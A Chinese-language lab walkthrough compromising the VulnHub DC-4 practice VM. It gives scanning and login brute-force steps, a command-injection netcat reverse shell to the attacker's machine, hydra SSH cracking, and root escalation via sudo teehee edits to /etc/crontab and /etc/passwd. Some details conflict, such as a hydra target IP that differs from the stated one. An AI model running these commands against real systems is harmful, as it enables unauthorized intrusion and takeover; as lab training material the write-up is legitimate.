vulnhub DC-4 靶机渗透
准备:
环境:vmware15.5以上(我用的是16.0的)
攻击机:kali 2019以上(2021)
靶机:DC-4
靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/
靶机ip:192.168.10.137
攻击机ip: 192.168.10.136
1、老样子 先查看自己攻击的IP 来确定网段
ipconfig

2、扫描网段内的存活主机
arp-scan -l

访问一下看看

这边只有一个登入的界面
3、老样子 我们先扫描一下端口和服务
nmap -T4 -A -p- 192.168.10.137

分析:
22 端口 ssh服务
80 端口 http服务
思路:
1、密码爆破
2、找到突破点(文件上传、命令执行等)上传小马
3、提权
4、敏感目录扫描
nikto -h 192.168.10.137

没有找到明感目录
5、暴力破解
1)、打开代理

2)、burp抓包
ctrl+i


一般攻击类型选Cluster bomb(交叉)
这里为了方便我就选了sniper 对密码单一破解
网站的用户名一般用的是admin
注:记得吧包放了
3)、设置playload



用户名:admin
密码:happy

登入后的界面
6、命令执行

发现是命令执行
1)、burp抓包
Ctrl+r (模拟提交)

记得吧包放了

发现它屏蔽了空格 它用+号代替
2)、nc反弹shell
kali监听端口
nc -lvp 5555

命令执行
nc+192.168.10.136+5555+-e+/bin/bash

nc+kali ip+端口+-e+/bin/bash

7、看看用户文件有啥
cd /
cd home/jim/backups
ls

这里只有jim文件夹下有有用的内容
old-passwords.bak 密码备份文件
8、将old密码弄成字典
cat old-passwords.bak

将密码复制下来 另存在kali上

9. hydra破解jim ssh登入密码
新开一个命令行
hydra -l jim -P passwd.txt -t 5 ssh://192.168.98.180

hydra -l jim -P 字典 -t 5 ssh://目标ip
login: jim
password: jibril04
10.登入ssh
ssh jim@192.168.10.137
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
jibril04

11.通过jim的邮件可以找到charles的密码
cd /var/mail
cat jim

charles的密码:^xHhA&hvim0y
12.切换charles用户
su charles

13.设置定时任务
echo root chmod 4777 /bin/sh > /etc/crontab

发现没权限
14.teehee提权
sudo teehee /etc/crontab
* * * * * root chmod 4777 /bin/sh
Ctrl+c保存退出

每分钟将 /bin/sh 的权限修改为4777
15.看看有没有改成功
ls -la /bin/sh

发现都可读可写可执行了
16.最后我们可以利用teehee创建一个root用户
sudo teehee -a /etc/passwd
user::0:0:::/bin/bash
su user


浙公网安备 33010602011771号